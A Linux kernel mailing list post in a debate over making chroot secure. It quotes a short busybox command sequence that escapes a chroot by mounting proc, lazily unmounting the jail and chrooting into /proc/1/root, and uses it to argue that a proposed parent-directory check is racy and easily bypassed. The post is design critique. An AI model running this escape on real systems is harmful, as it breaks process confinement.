This is basically both painfully racy and easily broken with umount
and/or access to proc. See this busybox-compatible example:
## Set up chroot
mkdir /root1
mount -o mode=0750 -t tmpfs tmpfs /root1
cp -a /bin/busybox /root1/busybox
## Enter chroot
chroot /root1 /busybox
## Mount proc
/busybox mkdir /proc
/busybox mount -t proc proc /proc
## Poke around root filesystem (this may be all you need)
/busybox ls /proc/1/root/
## Detach our chroot so we're no longer a sub-directory
/busybox umount -l /proc/1/root/root1
## Now we can easily chroot to the original root, since it isn't in
our ".." path
exec /busybox chroot /proc/1/root /bin/sh
See how easy that is? Unless you stick the above parent-directory
check (which is still racy against directories being moved around) for
*EVERY* directory component of *EVERY* open/chdir-ish syscall, you are
still going to be easily worked around through many different methods.
so there is no discussion about mount & others. I think, if you have
CAP_SYS_MOUNT/CAP_SYS_ADMIN, you need not solve chroot() and how to
break it.
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to [email protected]
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/
[Index of Archives]
[Kernel Newbies]
[Netfilter]
[Bugtraq]
[Photo]
[Stuff]
[Gimp]
[Yosemite News]
[MIPS Linux]
[ARM Linux]
[Linux Security]
[Linux RAID]
[Video 4 Linux]
[Linux for the blind]
[Linux Resources]
